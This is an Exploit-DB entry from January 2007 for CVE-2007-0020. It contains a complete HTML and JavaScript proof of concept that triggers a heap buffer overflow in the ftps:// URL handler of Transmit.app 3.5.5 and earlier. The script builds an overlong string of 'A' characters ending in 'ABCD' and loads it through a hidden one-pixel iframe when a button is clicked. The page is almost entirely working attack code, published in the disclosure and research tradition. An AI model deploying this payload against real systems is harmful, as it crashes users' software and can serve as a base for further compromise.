Transmit.app <= 3.5.5 ftps:// URL Handler Heap Buffer Overflow PoC

2007-01-20T00:00:00
ID EDB-ID:3160
Type exploitdb
Reporter MoAB
Modified 2007-01-20T00:00:00

Description

Transmit.app <= 3.5.5 ftps:// URL Handler Heap Buffer Overflow PoC. CVE-2007-0020. Dos exploit for osx platform

                                        
                                            &lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"&gt;
&lt;html&gt;
	&lt;head&gt;
		&lt;title&gt;MOAB-19-01-2007&lt;/title&gt;
		&lt;script&gt;
			function boom() {
			    var recipient = document.getElementById('testbox');
				var str = '';
				for (var i = 0; i &lt; 408; i++) {
				    str = str + 'A'
				}
				str = str + 'ABCD';
				
				alert('Payload size: ' + str.length);
				
				str = "ftps://" + str;
				ftarget = document.createElement('iframe');
				ftarget.src = str;
				ftarget.width = 1;
				ftarget.height = 1;
				recipient.appendChild(ftarget);
			}
		&lt;/script&gt;
	&lt;/head&gt;
	&lt;body&gt;
	    &lt;div id="testbox" style="display: none;"&gt;&lt;/div&gt;
		&lt;input type="button" onclick="boom();" value="Test MOAB-19-01-2007" /&gt;

	&lt;/body&gt;
&lt;/html&gt;

# milw0rm.com [2007-01-20]